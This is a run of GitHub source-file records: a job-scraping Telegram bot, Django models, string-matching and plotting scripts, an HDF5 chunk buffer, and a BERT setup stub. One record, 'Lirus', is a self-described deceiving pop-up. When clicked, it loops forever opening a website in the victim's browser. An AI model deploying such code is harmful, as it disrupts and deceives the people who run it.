offer.get('link')\n }\n for offer in offers]\n\ndef get_workingnomads_offers():\n print('Getting Working Nomads offers...')\n session = requests.Session()\n session.headers['User-Agent'] = (\n f'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, '\n f'like Gecko) Chrome/34.0.1847.131 Safari/537.36')\n\n response = session.get(f'https://www.workingnomads.co/api/exposed_jobs/')\n entries = json.loads(response.text)\n\n offers = [e for e in entries if check_if_workingnomads_offer_is_valid(e) is True]\n\n return [\n {\n 'title': offer.get('title'),\n 'company': offer.get('company_name'),\n 'date': datetime.strptime(offer.get('pub_date')[:19], '%Y-%m-%dT%H:%M:%S').strftime('%d-%m-%Y'),\n 'location': offer.get('location'),\n 'link': offer.get('url')\n }\n for offer in offers]\n\ndef get_weworkremotely_offers():\n print('Getting We Work Remotely offers...')\n rss = feedparser.parse('https://weworkremotely.com/categories/remote-programming-jobs.rss')\n entries = rss.entries\n\n offers = [e for e in entries if check_if_weworkremotely_offer_is_valid(e) is True]\n\n return [\n {\n 'title': offer.get('title'),\n 'company': offer.get('company_name'),\n 'date': datetime.strptime(offer.get('published'), '%a, %d %b %Y %H:%M:%S %z').strftime('%d-%m-%Y'),\n 'location': offer.get('region'),\n 'link': offer.get('link')\n }\n for offer in offers]\n\ndef get_remoteokio_offers():\n print('Getting RemoteOK.io offers...')\n rss = feedparser.parse('https://remoteok.io/remote-jobs.rss')\n entries = rss.entries\n\n offers = [e for e in entries if check_if_remoteokio_offer_is_valid(e) is True]\n\n return [\n {\n 'title': offer.get('title'),\n 'company': offer.get('company'),\n 'date': datetime.strptime(offer.get('published')[:-6], '%Y-%m-%dT%H:%M:%S').strftime('%d-%m-%Y'),\n 'link': offer.get('link')\n }\n for offer in offers]\n\ndef get_githubjobs_offers():\n print('Getting GitHub Jobs offers...')\n session = requests.Session()\n session.headers['User-Agent'] = (\n f'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, '\n f'like Gecko) Chrome/34.0.1847.131 Safari/537.36')\n\n entries = []\n for tag in TAGS:\n response = session.get(f'https://jobs.github.com/positions.json?description={tag}&location=remote')\n entries.extend(json.loads(response.text))\n\n # Removing duplicates based on ID\n entries = list(dict((o['id'], o) for o in entries).values())\n\n # Extracting the useful info\n offers = [e for e in entries if check_if_githubjobs_offer_is_valid(e) is True]\n\n return [\n {\n 'title': offer.get('title'),\n 'company': offer.get('company'),\n 'date': datetime.strptime(offer.get('created_at'), '%a %b %d %H:%M:%S UTC %Y').strftime('%d-%m-%Y'),\n 'link': offer.get('url')\n }\n for offer in offers]\n\n\ndef main():\n remoteio = get_remoteio_offers()\n workingnomads = get_workingnomads_offers()\n weworkremotely = get_weworkremotely_offers()\n remoteokio = get_remoteokio_offers()\n githubjobs = get_githubjobs_offers()\n\n raw_offers = remoteio + workingnomads + weworkremotely + remoteokio + githubjobs\n\n offers = []\n for offer in raw_offers:\n offers.append(\n f'Role: *{offer.get(\"title\")}* \\n'\n f'Company: {offer.get(\"company\")} \\n'\n f'Date: {offer.get(\"date\")} \\n'\n f'Link: {offer.get(\"link\")} \\n'\n f'Location: {offer.get(\"location\")}'\n )\n\n return offers\n\ndef publish_offers(event, context):\n bot = telegram.Bot(token=TOKEN)\n offers = main()\n\n if len(offers) == 0:\n bot.sendMessage(chat_id=CHAT_ID, text='No new offers.')\n else:\n for o in offers:\n bot.sendMessage(chat_id=CHAT_ID, text=o, parse_mode=telegram.ParseMode.MARKDOWN) \n time.sleep(5)\n\n print(f'{len(offers[1:])} offers found and sent at {str(datetime.now().time())}')\n","repo_name":"ruromgar/remote_jobs_bot","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":8449,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"18"} +{"seq_id":"36131187189","text":"import sys\n\nfrom django import forms\nfrom django.contrib.contenttypes import fields\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\n\nif sys.version < \"3\":\n text_type = unicode\nelse:\n text_type = str\n\n\n@python_2_unicode_compatible\nclass CustomField(models.Model):\n \"\"\"\n A field abstract -- it describe what the field is. There are one of these\n for each custom field the user configures.\n \"\"\"\n\n name = models.CharField(max_length=150)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n field_type = models.CharField(\n max_length=1,\n choices=(\n (\"t\", \"Text\"),\n (\"a\", \"Large Text Field\"),\n (\"i\", \"Integer\"),\n (\"f\", \"Floating point decimal\"),\n (\"b\", \"Boolean (Yes/No)\"),\n (\"m\", \"Dropdown Choices\"),\n (\"d\", \"Date\"),\n (\"h\", \"Date Time\"),\n ),\n default=\"t\",\n )\n default_value = models.CharField(\n max_length=5000,\n blank=True,\n help_text=\"You may leave blank. For Boolean use True or False\",\n )\n is_required = models.BooleanField(default=False)\n mask = models.CharField(\n max_length=5000,\n blank=True,\n help_text=\"You may leave blank. For user Jquery Mask, ex: '00/00/0000' for date.\",\n )\n field_choices = models.CharField(\n max_length=2000,\n blank=True,\n help_text=\"List the choices you want displayed, seperated by commas. \"\n \"This is only valid for Dropdown, Multiple, and Checkbox field types\",\n )\n\n def get_value_for_object(self, obj):\n return CustomFieldValue.objects.get_or_create(field=self, object_id=obj.id)[0]\n\n def __str__(self):\n return self.name\n\n def get_form_field(self):\n universal_kwargs = {\n \"initial\": self.default_value,\n \"required\": self.is_required,\n }\n if self.field_type == \"b\":\n return forms.BooleanField(**universal_kwargs)\n elif self.field_type == \"i\":\n return forms.IntegerField(**universal_kwargs)\n elif self.field_type == \"f\":\n return forms.FloatField(**universal_kwargs)\n elif self.field_type == \"a\":\n return forms.CharField(widget=forms.Textarea, **universal_kwargs)\n elif self.field_type == \"m\":\n choices = self.field_choices.split(\",\")\n if self.is_required is True:\n select_choices = ()\n else:\n select_choices = ((\"\", \"---------\"),)\n for choice in choices:\n select_choices = select_choices + ((choice, choice),)\n return forms.ChoiceField(choices=select_choices, **universal_kwargs)\n elif self.field_type == \"d\":\n return forms.DateField(**universal_kwargs)\n elif self.field_type == \"h\":\n return forms.DateTimeField(**universal_kwargs)\n return forms.CharField(**universal_kwargs)\n\n class Meta:\n unique_together = (\"name\", \"content_type\")\n\n\n@python_2_unicode_compatible\nclass CustomFieldValue(models.Model):\n \"\"\"\n A field instance -- contains the actual data. There are many of these, for\n each value that corresponds to a CustomField for a given model.\n \"\"\"\n\n field = models.ForeignKey(\n CustomField, related_name=\"instance\", on_delete=models.CASCADE\n )\n value = models.CharField(max_length=5000, blank=True, null=True)\n object_id = models.PositiveIntegerField()\n content_type = models.ForeignKey(\n ContentType, blank=True, null=True, on_delete=models.CASCADE\n )\n content_object = fields.GenericForeignKey(\"content_type\", \"object_id\")\n\n def __str__(self):\n return text_type(self.value)\n\n def save(self, *args, **kwargs):\n super(CustomFieldValue, self).save(*args, **kwargs)\n if not self.content_type:\n self.content_type = self.field.content_type\n self.save()\n\n def clean(self):\n form_field = self.get_form_field()\n form_field.clean(self.value)\n return super(CustomFieldValue, self).clean()\n\n def get_form_field(self):\n return self.field.get_form_field()\n\n class Meta:\n unique_together = (\"field\", \"object_id\")\n","repo_name":"willseward/django-custom-field","sub_path":"custom_field/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"18"} +{"seq_id":"24363454009","text":"# Given two patterns, find smaller pattern in the greater pattern.\n\n# Rabin karp algorithm is pattern matching alghorithm.\n# To find a sequence from a given pattern(n) usually we add up the pattern(m) which we want to find, and if the sum matches to the main pattern(n) we found the sequence index else we roll the rolling hash on next element in the sequence.\n\n# This gives the run time of O(n - m + 1), but in the cases where there are spurious hits the sum could be the same but the pattern don't matched, in such cases the run time can goes upto O(mn).\n\n# Here rabin karp algo came into picture. Rabin Karp algorithm used two: \n# Modular Arthmatic Hashing Function: h = (c1 X b**m-1 + c2 X b**m-2)\n# Rolling Hashing Formula: b*(hash - c * b**m-1 ) + c\n\n\n# https://python.plainenglish.io/a-simple-plagiarism-rate-checker-using-rabin-karp-string-matching-algorithm-in-python-e823d29d3f21\n\n# def rabin_karp(pattern, subPattern):\n# \tpattern = pattern.upper()\n# \tsubPattern = subPattern.upper()\n# \tlenPattern = len(pattern)\n# \tlenSubPattern = len(subPattern)\n# \tb = 26\n# \tsubHash = 0\n# \thash = 0\n# \tfor i in range(lenSubPattern):\n# \t\t# applying modular arthimatic formula: hash = c * b**m-i-1\n# \t\tsubHash += ((ord(subPattern[i])) * b**(lenSubPattern-i-1))\n# \t\thash += ((ord(pattern[i])) * b**(lenSubPattern-i-1))\n# \tprint(subHash)\n# \tprint(hash)\n\n# \tfor i in range(lenPattern-lenSubPattern+1):\n# \t\tif i != 0:\n# \t\t\t# Rolling hash formula: b*(hash - c * b**m-1 ) + c\n# \t\t\thash = b * (hash - (ord(pattern[i-1]))*(b**(lenSubPattern-1)))+ (ord(pattern[lenSubPattern+i-1]))\n\t\t\n# \t\tif hash == subHash:\n# \t\t\treturn (f'Sub Pattern Index at: {i}')\n\n# \treturn False\n\n\n\ndef pattern_matching(main_pattern, sub_pattern):\n\t\n\tmain_pattern = main_pattern.lower()\n\tsub_pattern = sub_pattern.lower()\n\n\tbase = 26\n\n\tmain_hash = 0\n\tsub_hash = 0\n\n\tfor i in range(len(sub_pattern)):\n\t\t# applying modular arthimatic formula: hash = c * b**m-i-1\n\t\tsub_hash += (ord(sub_pattern[i])) * (base**(len(sub_pattern) - i - 1))\n\t\tmain_hash += (ord(main_pattern[i]))* (base**(len(sub_pattern) - i - 1))\n\n\tfor i in range(len(main_pattern) - len(sub_pattern) + 1):\n\t\tif i != 0:\n\t\t\t# Rolling hash formula: b*(hash - c * b**m-1 ) + c\n\t\t\tmain_hash = base * (main_hash - (ord(main_pattern[i-1])) * (base**(len(sub_pattern) -1))) + (ord(main_pattern[len(sub_pattern)+i-1]))\n\n\t\tif main_hash == sub_hash:\n\t\t\treturn i\n\ndef main():\n string = 'vwxy'\n seq = 'xy'\n rks = pattern_matching(string, seq)\n print(rks)\n\n \nif __name__ == '__main__':\n main()\n","repo_name":"mushahidmehdi/Data-Structure-Algorithms","sub_path":"Array and Strings/rabin_karp_algo.py","file_name":"rabin_karp_algo.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40171335931","text":"# coding: utf-8\n\n\nfrom collections import Counter\n\n\nclass Container:\n\n def __init__(self, dic):\n self._list = [(key, dic[key]) for key in dic.keys()]\n self._list = sorted(self._list, key=lambda x: x[1], reverse=True)\n self._length = len(self._list)\n\n def money(self):\n length = self._length\n items = self._list\n\n if length == 1:\n value = items[0][0]\n return 50000 + (value * 5000)\n\n if length == 2:\n if items[0][1] == 3:\n value = items[0][0]\n return 10000 + (value * 1000)\n else:\n return 2000 + (items[0][0] * 500) + (items[1][0] * 500)\n \n if length == 3:\n return 1000 + (items[0][0] * 100)\n\n items.sort(reverse=True)\n return 100 * items[0][0]\n\n\n\nn = int(input())\n\nma = 0\nfor _ in range(n):\n numbers = [int(x) for x in input().split()]\n numbers = Counter(numbers)\n c = Container(numbers)\n m = c.money()\n if ma < m:\n ma = m\n\nprint(ma)\n \n\n","repo_name":"lee-seul/baekjoon","sub_path":"2484.py","file_name":"2484.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"40121969047","text":"#Lirus: World's best deceiving pop-up, I think\nversion=\"1.0\"\n\n#Libraries and modules\nimport pygame #Pygame garbage\nfrom pygame.constants import MOUSEBUTTONDOWN #Pygame being able to sense when the Pygame window is being clicked\nimport webbrowser #This is used so Lirus can open websites\n\n#Resolution of the image/Width and height of the window\nX = 320 #Width\nY = 191 #Height \n\npygame.init() #pygame becomes real\n\ndisplay_surface = pygame.display.set_mode((X, Y ))\n \npygame.display.set_caption('DONT WAIT') #Window name\n \nimage = pygame.image.load(r'techtips.jpg') #The image that we want to load\n \nwhile True:\n\n display_surface.blit(image, (0, 0)) #Displays the image in the Pygame window\n\n for event in pygame.event.get():\n\n #If the window is clicked, open many web pages in the \"victim's\" default web browser\n if event.type == MOUSEBUTTONDOWN:\n while True:\n webbrowser.open(\"https://linus-sex.tips/\", new=1) \n\n pygame.display.update() #Refresh the screen\n","repo_name":"remstik/Lirus","sub_path":"Lirus.py","file_name":"Lirus.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28835501078","text":"import os\nimport numpy as np\n\nshould_save = True\n\n# ----- Parse command-line args -----\n\nif len(os.sys.argv) < 2:\n print(\"Please provide a folder containing results.\")\n os.sys.exit(1)\n\nres_folder = os.sys.argv[1]\n\nif len(os.sys.argv) > 2:\n should_save = bool(int(os.sys.argv[2]))\n qualifier = \"Will\" if should_save else \"Won't\"\n print(qualifier + \" save plot\")\n\n# ----- Load in hyperparameters -----\n\nhyper_loc = os.path.join(res_folder, 'hyperparams.txt')\nwith open(hyper_loc, 'r') as hyper_file:\n hyper_str = hyper_file.readline() # Hyperparam dict on first line\n # Name of training file on second line\n train_file_name = hyper_file.readline().split(': ')[-1]\n\ntrain_file_name = train_file_name.strip()\ntrain_file = os.path.join(res_folder, os.path.pardir, os.path.pardir,\n 'training', train_file_name)\n\n# Load in training data\nwith np.load(train_file) as f:\n training_in = f['x']\n training_out = f['y']\n true_in = f['x_true']\n true_out = f['y_true']\n\n# Load in network outputs\noutput_file = os.path.join(res_folder, 'output.npz')\nwith np.load(output_file) as f:\n predictions_in = f['inputs']\n predictions_out = f['predictions']\n\n\n# ----- Plot results -----\n\nimport matplotlib.pyplot as plt\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\n# Plot predictions, training data, and \"true\" (non-noisy) curve\ntrue_curve, = plt.plot(true_in, true_out, c='g')\npredicted_scatter = plt.scatter(predictions_in, predictions_out,\n c='r', marker='x')\ninput_scatter = plt.scatter(training_in, training_out, c='b', marker='o')\n\nplt.legend([true_curve, input_scatter, predicted_scatter],\n ['True Curve', 'Training Data', 'Prediction'], scatterpoints=1)\nplt.xlabel(\"$x$\", fontsize=18)\n\ny_str = r'$f(x)$'\nif 'sinc' in train_file:\n y_str = r'sinc$(x)$'\nelif 'sin' in train_file:\n y_str = r'$\\sin (x)$'\nelif 'x_cubed' in train_file:\n y_str = r'$x^3$'\n\nplt.ylabel(y_str, fontsize=18)\n\nif should_save:\n save_path = os.path.join(res_folder, 'plot.eps')\n plt.savefig(save_path, bbox_inches='tight')\n print(\"Saved plot to: \" + save_path)\n\nplt.show()\n","repo_name":"lewis-od/QNN","sub_path":"plot_output.py","file_name":"plot_output.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"1152009085","text":"from contextlib import contextmanager\nfrom pathlib import Path\nfrom typing import List, Optional, Tuple, Union\n\nimport h5py as h5\nimport numpy as np\n\nfrom .h5utils import get_dataset_name, open_or_pass_file, open_or_pass_dataset\nfrom .types import File, Dataset, Shape, DType\n\n\nclass ChunkBuffer:\n \"\"\"\n Hold a buffer to a single chunk of an HDF5 dataset.\n\n This class stores a chunk of an HDF5 dataset in memory as a numpy array and provides methods\n for synchronizing the buffer with the file.\n It is important to note that ChunkBuffer never reads from or writes to the file on its own.\n The user must call the corresponding methods to ensure that the buffer and file are up to date.\n\n ChunkBuffer maintains an index to a chunk in the dataset.\n A chunk index is a tuple of ndim numbers, where ndim is the number of dimensions (ranks)\n of the dataset.\n This index can be changed with the 'select' method.\n The 'read' and 'write' methods use the currently selected index if not given a different index\n as an argument (only 'read').\n\n It is possible to handle chunks that are not fully filled (size of dataset is not a multiple\n of the chunk size).\n However, ChunkBuffer always holds a full chunk in memory and does not maintain any information\n on how much the chunk is filled as the user has direct write access to the underlying array.\n The read and write methods can return / take as argument the fill level of the chunk and the\n user has to use those appropriately.\n The 'fill level' is a tuple or list of integers that indicates for each dimension how many\n elements are in use.\n For example, for a fully filled chunk, fill_level = chunk_shape.\n For a half filled chunk, fill_level = [size // 2 for size in chunk_shape].\n \"\"\"\n\n def __init__(self, file: File,\n dataset: Dataset,\n shape: Shape = None,\n dtype: DType = None,\n data: Optional[np.ndarray] = None,\n maxshape: Shape = None):\n \"\"\"\n Construct a ChunkBuffer in memory.\n Does not verify if a suitable dataset exists in the file or create one.\n The first chunk of the dataset is selected.\n\n :param file: The file that the dataset lives in.\n :param dataset: The dataset to buffer.\n :param shape: Shape of the *chunk*, not the whole dataset. Required if data is None.\n :param dtype: Datatype of the dataset.\n :param data: Initial data for the *chunk*, not the whole dataset.\n The chunk shape is inferred from this if argument shape is None, otherwise,\n attempts to reshape the array.\n :param maxshape: Maximum shape of the dataset.\n \"\"\"\n\n # special casing on str instead of converting any file to Path allows for streams\n self._filename = (Path(file.filename) if isinstance(file, h5.File)\n else (Path(file) if isinstance(file, str) else file))\n self._dataset_name = get_dataset_name(dataset)\n\n if data is not None:\n self._buffer = np.array(data, dtype=dtype)\n if shape is not None:\n self._buffer = self._buffer.reshape(shape)\n else:\n self._buffer = np.empty(shape, dtype=dtype)\n\n self._maxshape = tuple(maxshape) if isinstance(maxshape, (tuple, list)) else (None,) * self._buffer.ndim\n if len(self._maxshape) != len(self._buffer.shape):\n raise ValueError(f\"Argument maxshape {maxshape} has wrong number of dimensions. \"\n f\"Expected {len(self._buffer.shape)} according to buffer shape.\")\n\n self._chunk_index = (0,) * self._buffer.ndim\n\n @classmethod\n def load(cls, file: File,\n dataset: Dataset,\n chunk_index: Shape,\n o_fill_level: Optional[List[int]] = None):\n \"\"\"\n Load a chunk of an existing dataset.\n\n :param file: The file containing the dataset.\n :param dataset: The dataset to load. Must be chunked.\n :param chunk_index: The chunk to load.\n :param o_fill_level: If given a list, it is filled with the fill level of the loaded chunk.\n :return: A newly constructed ChunkBuffer.\n \"\"\"\n\n with open_or_pass_dataset(file, dataset, None, \"r\") as dataset:\n chunk_buffer = cls(file, dataset, dataset.chunks, dtype=dataset.dtype, maxshape=dataset.maxshape)\n chunk_buffer.select(_normalise_chunk_index(chunk_index,\n _chunk_number(dataset.shape, chunk_buffer._buffer.shape)))\n fill_level = chunk_buffer.read(dataset=dataset)\n\n if o_fill_level is not None:\n o_fill_level.clear()\n o_fill_level.extend(fill_level)\n return chunk_buffer\n\n @property\n def data(self) -> np.ndarray:\n \"\"\"\n A view of the stored buffer.\n You can read and modify the data contained in the buffer through this view.\n\n Note that this only accesses the buffer in memory, you need to call\n read / write to synchronise with the file.\n \"\"\"\n return self._buffer.view()\n\n @property\n def shape(self) -> Shape:\n \"\"\"\n The shape of the buffer, that is the shape of a single chunk.\n \"\"\"\n return self._buffer.shape\n\n @property\n def ndim(self) -> int:\n \"\"\"\n The number of dimensions (ranks) of the dataset.\n \"\"\"\n return self._buffer.ndim\n\n @property\n def dtype(self) -> np.dtype:\n \"\"\"\n The datatype of the dataset.\n \"\"\"\n return self._buffer.dtype\n\n @property\n def maxshape(self) -> Shape:\n \"\"\"\n The maximum shape of the dataset.\n \"\"\"\n return self._maxshape\n\n @property\n def chunk_index(self) -> Shape:\n \"\"\"\n The current chunk index (immutable).\n \"\"\"\n return self._chunk_index\n\n @property\n def filename(self) -> Path:\n \"\"\"\n The name of the HDF5 file.\n \"\"\"\n return self._filename\n\n @property\n def dataset_name(self) -> Path:\n \"\"\"\n The full path of the dataset inside of the HDF5 file.\n \"\"\"\n return self._dataset_name\n\n def select(self, chunk_index: Shape):\n \"\"\"\n Select a chunk.\n\n This function verifies that the index is valid based on metadata that is available in memory.\n No synchronisation with the file happens, in particular the chunk is not read from the file\n and the buffer keeps its prior contents.\n\n :param chunk_index: A tuple of indices of the chunk to select. All indices must be positive.\n \"\"\"\n\n # validate index\n if len(chunk_index) != self.ndim:\n raise IndexError(f\"Invalid index dimension {len(chunk_index)} for dataset dimension {self.ndim}.\")\n for dim, (index, length, maxlength) in enumerate(zip(chunk_index, self._buffer.shape, self._maxshape)):\n if index < 0:\n raise IndexError(f\"Negative chunk_index in dimension {dim}. Only positive values allowed.\")\n if maxlength is not None and index * length >= maxlength:\n raise IndexError(f\"chunk_index {chunk_index} out of bounds in dimension {dim} \"\n f\"with maxshape {self._maxshape}\")\n\n self._chunk_index = chunk_index\n\n @contextmanager\n def _load_or_pass_dataset(self, file: Optional[File], dataset: Optional[Dataset], filemode: str):\n \"\"\"\n Contextmanager to load a dataset from file or pass along the argument.\n \"\"\"\n\n if dataset is None:\n with open_or_pass_file(file, self._filename, filemode) as h5f:\n yield h5f[str(self._dataset_name)]\n else:\n dataset_name = get_dataset_name(dataset)\n if dataset_name != self.dataset_name:\n raise ValueError(f\"Wrong dataset. Stored: {self.dataset_name}, you passed in {dataset_name}.\")\n # Only check if self._filename is a Path in order to allow for storing streams.\n if isinstance(self._filename, Path) and dataset.file.filename != str(self._filename):\n raise ValueError(f\"Dataset is not in the stored file ({self._filename}).\")\n\n if isinstance(dataset, h5.Dataset):\n yield dataset\n else:\n with open_or_pass_file(file, self._filename, filemode) as h5f:\n yield h5f[str(dataset)]\n\n @contextmanager\n def _retrieve_dataset(self, file: Optional[File], dataset: Optional[Dataset], filemode: str):\n \"\"\"\n Contextmanager to get a handle to the dataset.\n Checks metadata of self against the file.\n \"\"\"\n\n with self._load_or_pass_dataset(file, dataset, filemode) as dataset:\n def raise_error(name, in_file, in_memory):\n raise RuntimeError(f\"The {name} of dataset {dataset.name} in file {dataset.file.filename} ({in_file}) \"\n f\"does not match the {name} of ChunkBuffer ({in_memory}).\")\n\n if dataset.chunks != self._buffer.shape:\n raise_error(\"chunk shape\", dataset.chunks, self._buffer.shape)\n if dataset.dtype != self._buffer.dtype:\n raise_error(\"datatype\", dataset.dtype, self._buffer.dtype)\n if dataset.maxshape != self._maxshape:\n raise_error(\"maximum shape\", dataset.maxshape, self._maxshape)\n\n yield dataset\n\n def read(self, chunk_index: Optional[Shape] = None,\n file: Optional[File] = None,\n dataset: Optional[Dataset] = None) -> Union[List[int], Tuple[int, ...]]:\n \"\"\"\n Read a chunk from the file.\n\n The chunk must exist in the dataset in the HDF5 file.\n All stored metadata is checked against the file and an error is raised if there is a mismatch.\n\n An existing file or dataset handle to a currently open connection can be passed in as arguments\n to avoid opening the file on every call to this function.\n\n :param chunk_index: Index of the chunk to read.\n If None, use currently selected chunk, i.e. self.chunk_index.\n :param file: Indicates the file to read from. If given, it must match the filename stored in the buffer.\n :param dataset: Indicates the dataset to read from.\n :return: The fill level of the chunk.\n \"\"\"\n\n with self._retrieve_dataset(file, dataset, \"r\") as dataset:\n if chunk_index is not None:\n self.select(chunk_index)\n nchunks = _chunk_number(dataset.shape, self._buffer.shape)\n for dim, (i, n) in enumerate(zip(self.chunk_index, nchunks)):\n if i >= n:\n raise IndexError(f\"Chunk index {i} out of bounds in dimension {dim} with number of chunks = {n}\")\n\n fill_level = _chunk_fill_level(dataset.shape, self._buffer.shape, self._chunk_index, nchunks)\n dataset.read_direct(self._buffer,\n source_sel=_chunk_slices(self._chunk_index, self._buffer.shape),\n dest_sel=tuple(slice(0, n) for n in fill_level))\n return fill_level\n\n def write(self, must_exist: bool,\n fill_level: Optional[Union[List[int], Tuple[int, ...]]] = None,\n file: Optional[File] = None,\n dataset: Optional[Dataset] = None):\n \"\"\"\n Write the currently selected chunk to the file.\n\n All stored metadata is checked against the file and an error is raised if there is a mismatch.\n\n An existing file or dataset handle to a currently open connection can be passed in as arguments\n to avoid opening the file on every call to this function.\n\n :param must_exist: If True, raise an error if the chunk is not already allocated in the dataset.\n If False, resize the dataset to include the chunk but only up to the fill level.\n :param fill_level: For each dimension, indicate the fill level of the chunk.\n Only the parts of the buffer within the fill level are written.\n :param file: Indicates the file to write to. If given, it must match the filename stored in the buffer.\n :param dataset: Indicates the dataset to write to.\n \"\"\"\n\n fill_level = self._buffer.shape if fill_level is None else fill_level\n required_shape = _required_dataset_shape(self._chunk_index,\n self._buffer.shape,\n fill_level)\n\n with self._retrieve_dataset(file, dataset, \"a\") as dataset:\n if any(required > current\n for required, current in zip(required_shape, dataset.shape)):\n if must_exist:\n raise RuntimeError(f\"The currently selected chunk {self._chunk_index} \"\n f\"does not exist in dataset {dataset.name}. \"\n \"Use must_exist=False to resize.\")\n else:\n dataset.resize(max(required, existing)\n for required, existing in zip(required_shape,\n dataset.shape))\n\n dataset.write_direct(self._buffer,\n source_sel=tuple(slice(0, n) for n in fill_level),\n dest_sel=_chunk_slices(self._chunk_index, self._buffer.shape))\n\n def create_dataset(self, file: Optional[File] = None,\n filemode: str = \"a\",\n write: bool = True,\n fill_level: Optional[Union[List[int], Tuple[int, ...]]] = None):\n \"\"\"\n Create a new dataset in the file big enough to contain the currently selected chunk.\n\n :param file: If given, use this file handle to access the HDF5 file, otherwise use the stored filename.\n :param filemode: Open-mode of the file, see documentation of h5py.File.\n :param write: If True, write the buffer to the dataset.\n Only the selected chunk is written, the content of the other chunks is undefined.\n If False, no data is written, the contents of the dataset are undefined.\n :param fill_level: For each dimension, indicate the fill level of the chunk.\n Used for computing the shape of the dataset and which parts of the buffer to write.\n \"\"\"\n\n fill_level = self._buffer.shape if fill_level is None else fill_level\n\n with open_or_pass_file(file, self._filename, filemode) as h5f:\n dataset = h5f.create_dataset(str(self._dataset_name),\n _required_dataset_shape(self._chunk_index,\n self._buffer.shape,\n fill_level),\n chunks=self._buffer.shape,\n maxshape=self._maxshape,\n dtype=self.dtype)\n if write:\n self.write(True, dataset=dataset, fill_level=fill_level)\n\n\ndef _normalise_chunk_index(chunk_index: Shape, nchunks: Shape) -> Shape:\n \"\"\"\n Make sure the chunk index is within bounds and return a new tuple where all negative indices are\n replaced by corresponding positive onces.\n \"\"\"\n\n if len(chunk_index) != len(nchunks):\n raise IndexError(f\"Invalid index dimension {len(chunk_index)} for dataset dimension {len(nchunks)}\")\n\n normalised = []\n for index, length in zip(chunk_index, nchunks):\n if not (-length <= index < length):\n raise IndexError(f\"chunk_index {chunk_index} is out of range with number of chunks {nchunks}\")\n normalised.append(index if index >= 0 else length + index)\n return tuple(normalised)\n\n\ndef _tuple_ceildiv(numerator: Shape, denominator: Shape) -> Shape:\n # -(-n // d) computes ceil(n / d) but to infinite precision.\n return tuple(-(-num // den) for num, den in zip(numerator, denominator))\n\n\ndef _chunk_number(full_shape: Shape, chunk_shape: Shape) -> Shape:\n \"\"\"\n :param full_shape: Shape of the entire dataset.\n :param chunk_shape: Shape of a single chunk\n :return: Number of chunks in every dimension.\n \"\"\"\n return _tuple_ceildiv(full_shape, chunk_shape)\n\n\ndef _chunk_fill_level(full_shape: Shape, chunk_shape: Shape, chunk_index: Shape, nchunks: Shape) -> Shape:\n \"\"\"\n :param full_shape: Shape of the entire dataset.\n :param chunk_shape: Shape of a single chunk.\n :param chunk_index: Index of a chunk.\n :param nchunks: Number of chunks.\n :return: Fill level of the given chunk.\n \"\"\"\n\n # The Modulo operation evaluates to\n # for i in range(2*n): n - (-i % n)\n # -> n, 1, 2, ..., n-2, n-1, n, 1, 2, ..., n-2, n-1\n # This is needed because remainder = 0 means, the chunk is fully filled, i.e. fill_level = n.\n return tuple(chunk - (-full % chunk) if idx == nchunk - 1 else chunk\n for full, chunk, idx, nchunk in zip(full_shape, chunk_shape, chunk_index, nchunks))\n\n\ndef _chunk_slices(chunk_index: Shape, chunk_shape: Shape) -> Tuple[slice, ...]:\n \"\"\"\n :param chunk_index: Index of a chunk.\n :param chunk_shape: Shape of chunks.\n :return: Slices into the dataset to address the given chunk.\n \"\"\"\n return tuple(slice(i * n, (i + 1) * n)\n for i, n in zip(chunk_index, chunk_shape))\n\n\ndef _required_dataset_shape(chunk_index: Shape, chunk_shape: Shape, fill_level: Union[Shape, List[int]]) -> Shape:\n \"\"\"\n Return the minimum dataset shape to include the given chunk with the given fill level.\n \"\"\"\n for dim, (length, fl) in enumerate(zip(chunk_shape, fill_level)):\n if fl > length:\n raise ValueError(f\"Fill level {fill_level} is greater than chunk shape {chunk_shape} in dimension {dim}.\")\n return tuple(idx * length + fl\n for idx, length, fl in zip(chunk_index, chunk_shape, fill_level))\n","repo_name":"jl-wynen/pentinsula","sub_path":"pentinsula/chunkbuffer.py","file_name":"chunkbuffer.py","file_ext":"py","file_size_in_byte":18285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72805390121","text":"# 分类模型训练\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '2' # 设置GPU编号\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nfrom bert4keras.backend import keras, K, search_layer\nfrom bert4keras.models import build_transformer_model\nfrom bert4keras.optimizers import extend_with_gradient_accumulation\nfrom bert4keras.snippets import sequence_padding, DataGenerator\nfrom bert4keras.tokenizers import Tokenizer\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, Callback\nfrom keras.callbacks import ReduceLROnPlateau\nfrom keras.layers import *\nfrom keras.optimizers import Adam\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import StratifiedKFold # 分层K折\nfrom keras.utils import multi_gpu_model\nfrom multi_gpu import to_multi_gpu\n\n\n# bert config(这里使用rank1的训练好的,自己训练太麻烦了,不过能跑通,能理解)\nconfig_path = 'bert/chinese_L-12_H-768_A-12/bert_config.json'\ncheckpoint_path = 'bert/chinese_L-12_H-768_A-12/bert_model.ckpt'\ndict_path = 'bert/chinese_L-12_H-768_A-12/vocab.txt'\n\nn = 5 # 